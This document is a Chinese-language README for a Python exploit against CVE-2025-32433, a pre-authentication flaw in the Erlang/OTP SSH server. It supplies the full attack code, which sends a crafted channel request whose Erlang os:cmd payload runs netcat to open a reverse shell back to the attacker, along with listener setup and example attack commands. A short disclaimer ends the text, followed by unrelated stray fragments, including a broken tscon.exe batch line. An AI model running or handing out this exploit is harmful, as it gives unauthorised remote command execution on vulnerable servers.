CVE-2025-32433 Erlang SSH 漏洞利用工具
项目描述
这是一个针对CVE-2025-32433漏洞的Python自动化利用脚本。该漏洞存在于Erlang/OTP的SSH服务器库中,影响OTP-27.3.3、OTP-26.2.5.11和OTP-25.3.2.20之前的版本。攻击者可以利用此漏洞在无需有效凭证的情况下执行任意命令,获得未经授权的系统访问权限。本项目提供了一个完整的利用工具,通过发送特制的预认证SSH通道请求,触发Erlang RCE载荷并建立反向Shell连接。
功能特性
- 自动化攻击流程: 自动处理SSH协议握手、通道建立和载荷发送全过程
- 灵活的参数配置: 支持自定义攻击机和目标机的IP地址与端口
- Erlang RCE载荷: 利用
os:cmd函数执行Netcat命令建立反向Shell - 详细的日志输出: 提供每个攻击阶段的实时状态反馈
- 协议级封装: 正确实现SSH消息格式、填充和长度编码
- 异常处理: 包含完善的错误捕获和连接超时机制
- 命令行友好: 使用
argparse库提供清晰的帮助信息和参数验证
安装指南
系统要求
- Python 3.6 或更高版本
- 网络连接权限(用于连接目标SSH服务)
- 攻击机上需要运行Netcat监听器
安装步骤
克隆或下载脚本
gitclone<repository-url># 或直接下载 CVE-2025-32433.py 文件确保Python环境可用
python3 --version无需额外依赖
- 脚本仅使用Python标准库:
argparse、socket、struct、time、sys
- 脚本仅使用Python标准库:
使用说明
基本使用流程
启动Netcat监听器(在攻击机上)
nc-lvnp4444运行漏洞利用脚本
python3 CVE-2025-32433.py -lh192.168.1.100 -lp4444-rh10.0.0.5 -rp22等待Shell连接
- 如果目标系统易受攻击,反向Shell将连接到您的监听器
参数详解
| 参数 | 简写 | 必选 | 默认值 | 描述 |
|---|---|---|---|---|
--lhost | -lh | 是 | - | 接收反向Shell的本地IP地址 |
--lport | -lp | 是 | - | 接收反向Shell的本地端口 |
--rhost | -rh | 否 | 10.10.10.10 | 目标SSH服务器IP地址 |
--rport | -rp | 否 | 22 | 目标SSH服务器端口 |
--help | -h | 否 | - | 显示帮助信息 |
使用示例
攻击内网目标:
python3 CVE-2025-32433.py -lh192.168.1.100 -lp4444-rh192.168.1.50攻击自定义端口:
python3 CVE-2025-32433.py -lh10.0.0.2 -lp5555-rh vulnerable.com -rp2222核心代码
1. 参数解析模块
defparse_args():parser=argparse.ArgumentParser(description="CTF exploit: send a pre-auth SSH channel request ""with an Erlang RCE payload to get a reverse shell")parser.add_argument("-lh","--lhost",required=True,help="Local host/IP to receive the reverse shell")parser.add_argument("-lp","--lport",type=int,required=True,help="Local port to receive the reverse shell")parser.add_argument("-rh","--rhost",default="10.10.10.10",help="Target SSH server IP (default: 10.10.10.10)")parser.add_argument("-rp","--rport",type=int,default=22,help="Target SSH server port (default: 22)")returnparser.parse_args()代码说明:使用argparse库定义命令行参数,包括必需的本地监听地址/端口和可选的目标地址/端口,提供清晰的帮助信息。
2. SSH消息构造模块
defstring_payload(s:str)->bytes:b=s.encode("utf-8")returnstruct.pack(">I",len(b))+bdefbuild_channel_request(channel_id:int,lhost:str,lport:int)->bytes:# Erlang RCE payload using netcat; trailing period is requiredpayload=f'os:cmd("nc{lhost}{lport}-e /bin/sh").'return(b"\x62"# SSH_MSG_CHANNEL_REQUEST+struct.pack(">I",channel_id)+string_payload("exec")+b"\x01"# want_reply = True+string_payload(payload))代码说明:构建SSH协议消息,其中关键部分是生成Erlang RCE载荷,通过os:cmd函数执行Netcat命令建立反向Shell,注意末尾的句点是Erlang语法要求。
3. SSH数据包封装模块
defpad_packet(pkt:bytes,block_size:int=8)->bytes:min_pad=4pad_len=block_size-((len(pkt)+5)%block_size)ifpad_len<min_pad:pad_len+=block_size total_len=len(pkt)+1+pad_lenreturnstruct.pack(">I",total_len)+bytes([pad_len])+pkt+b"\x00"*pad_len代码说明:实现SSH协议的数据包填充机制,计算正确的填充长度以确保数据包符合SSH协议规范,包括总长度、填充长度和实际内容。
4. 主攻击逻辑模块
defmain():args=parse_args()print(f"[*] Target:{args.rhost}:{args.rport}")print(f"[*] Listener:{args.lhost}:{args.lport}")try:withsocket.create_connection((args.rhost,args.rport),timeout=5)ass:print("[*] Connected. Exchanging banner...")s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")banner=s.recv(1024)print(f"[+] Banner:{banner.strip().decode(errors='ignore')}")time.sleep(0.3)print("[*] Sending fake KEXINIT...")s.sendall(pad_packet(build_kexinit()))time.sleep(0.3)print("[*] Opening channel...")s.sendall(pad_packet(build_channel_open()))time.sleep(0.3)print("[*] Sending exec request with Erlang reverse-shell payload...")req=build_channel_request(0,args.lhost,args.lport)s.sendall(pad_packet(req))print("[✓] Payload sent. If the server is vulnerable, check your listener now.")exceptExceptionase:print(f"[!] Exploit failed:{e}")sys.exit(1)代码说明:主攻击流程,建立TCP连接,发送SSH横幅,伪造密钥交换初始化,打开SSH通道,最后发送包含RCE载荷的通道请求,每个步骤间有适当延迟以确保协议顺序。
5. KEXINIT构造模块
defbuild_kexinit()->bytes:cookie=b"\x00"*16defnl(lst):returnstring_payload(",".join(lst))return(b"\x14"# SSH_MSG_KEXINIT+cookie+nl(["curve25519-sha256","ecdh-sha2-nistp256","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256",])+nl(["rsa-sha2-256","rsa-sha2-512"])+nl(["aes128-ctr"])*2+nl(["hmac-sha1"])*2+nl(["none"])*2+nl([])*2+b"\x00"# first_kex_packet_follows+struct.pack(">I",0)# reserved)代码说明:构造SSH密钥交换初始化消息,定义支持的算法列表,包括密钥交换算法、主机密钥算法、加密算法和MAC算法,使用空cookie和适当的保留字段。
免责声明: 本工具仅供教育、研究和授权安全测试使用。请仅对您拥有合法权限的系统进行测试。未经授权攻击他人系统是违法行为。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ5ZLZ6sDpmKDPWlvvdwWfc+
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
)
 do (%windir%\System32\tscon.exe %%s /dest:)
